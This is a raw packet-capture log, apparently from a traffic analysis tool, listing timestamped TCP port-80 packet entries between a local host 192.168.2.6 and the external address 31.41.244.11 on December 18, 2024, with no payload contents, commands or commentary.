                                                                                                                                                              Dec 18, 2024 11:47:28.883620024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.883687973 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.883701086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.883723021 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.883761883 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.884432077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.884462118 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.884474039 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.884505987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.884505987 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.884536982 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.885262966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.885276079 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.885289907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.885343075 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.886061907 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.886084080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.886096954 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.886135101 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.886185884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.886892080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.886905909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.886918068 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.886971951 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.886971951 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.887731075 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.887743950 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.887758017 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.887803078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.887815952 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.888439894 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.888453007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.888529062 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.888545990 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.888607025 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:28.889492035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:28.889631033 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.052526951 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.052545071 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.052558899 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.052805901 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.052839994 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.052862883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.052875042 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.052907944 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.052999973 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.053692102 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.053703070 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.053716898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.053862095 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.054549932 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.054563046 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.054574013 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.054923058 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.055299997 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.055316925 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.055330992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.055350065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.055392027 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.056029081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.056051016 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.056061983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.056082964 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.056188107 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.056898117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.056910992 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.056925058 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.056946993 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.056960106 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.057837009 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.057847977 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.057859898 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.057895899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.057895899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.058567047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.058578968 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.058592081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.058613062 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.058667898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.059340000 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.059350967 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.059364080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.059408903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.059408903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.060138941 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.060151100 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.060163975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.060208082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.060208082 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.060954094 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.060971975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.060985088 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.061009884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.061009884 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.061764956 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.061777115 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.061791897 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.061819077 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.061840057 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.062498093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.062566042 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.062580109 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.062593937 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.062635899 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.063307047 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.063332081 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.063345909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.063360929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.063394070 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.063394070 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.064172983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.064191103 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.064203024 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.064233065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.064233065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.064245939 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.064872026 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.064893007 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.064904928 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.064925909 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.064925909 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.064940929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.065752983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.065764904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.065777063 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.065813065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.065813065 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.066499949 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.066513062 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.066526890 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.066567898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.066567898 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.067337036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.067348003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.067384958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.067418098 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.067418098 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.068156958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.068169117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.068181038 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.068226099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.068226099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.068950891 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.068962097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.068974018 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.069021940 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.069021940 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.069704056 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.069787979 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.069977045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.069988966 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.070000887 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.070030928 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.070030928 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.070782900 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.070795059 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.070810080 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.070852995 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.070897102 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.071576118 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.071587086 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.071599960 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.071626902 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.071669102 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.072411060 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.072423935 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.072436094 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.072470903 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.072510004 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.073337078 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.073348045 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.073362112 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.073383093 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.073402882 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.074067116 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.074109077 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.074121952 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.074139118 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.074371099 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.075026035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.075037956 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.075048923 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.075088024 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.075088024 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.075599909 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.075622082 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.075634003 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.075649023 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.075671911 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.075671911 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.076387882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.076431036 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.076442957 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.076463938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.076463938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.076497078 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.077208042 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.077230930 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.077243090 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.077260971 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.077285051 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.077285051 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.077961922 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.078006983 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.078006983 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.078018904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.078054905 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.078054905 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.078906059 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.078988075 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.079031944 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.079077959 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.079092979 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.079160929 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.079622984 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.079634905 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.079651117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.079677105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.079677105 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.079751015 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.080315113 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.080365896 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.243582010 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.243598938 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.243611097 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.243644953 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.243738890 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.243979931 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.243993044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.244004965 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.244034052 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.244066000 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.244810104 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.244822025 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.244832993 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.244858027 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.244899035 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.245579958 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.245592117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.245603085 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.245651960 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.245651960 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.246352911 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.246364117 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.246376991 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.246404886 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.246731997 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.247256041 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.247267962 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.247279882 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.247332096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.247332096 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.247904062 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.247961044 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.247973919 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.248020887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.248020887 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.248884916 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.248895884 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.248908043 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.248922110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.248939991 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.248958111 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.249684095 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.249696970 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.249708891 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.249763012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.249763012 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.250402927 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.250427008 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.250437975 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.250493050 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.250493050 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.251192093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.251238108 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.251250029 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.251295090 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.251295090 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.251981020 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.251991987 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.252003908 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.252036095 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.252052069 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.252818108 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.252830029 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.252842903 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.252890110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.252890110 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.253580093 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.253592968 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.253604889 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.253736973 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.253813028 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.254362106 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.254406929 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.254419088 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.254483938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.254483938 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.255187035 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.255362988 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.255376101 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.255429029 CET4983780192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:29.255987883 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.256038904 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.256052017 CET804983731.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:29.256067991 CET4983780192.168.2.631.41.244.11
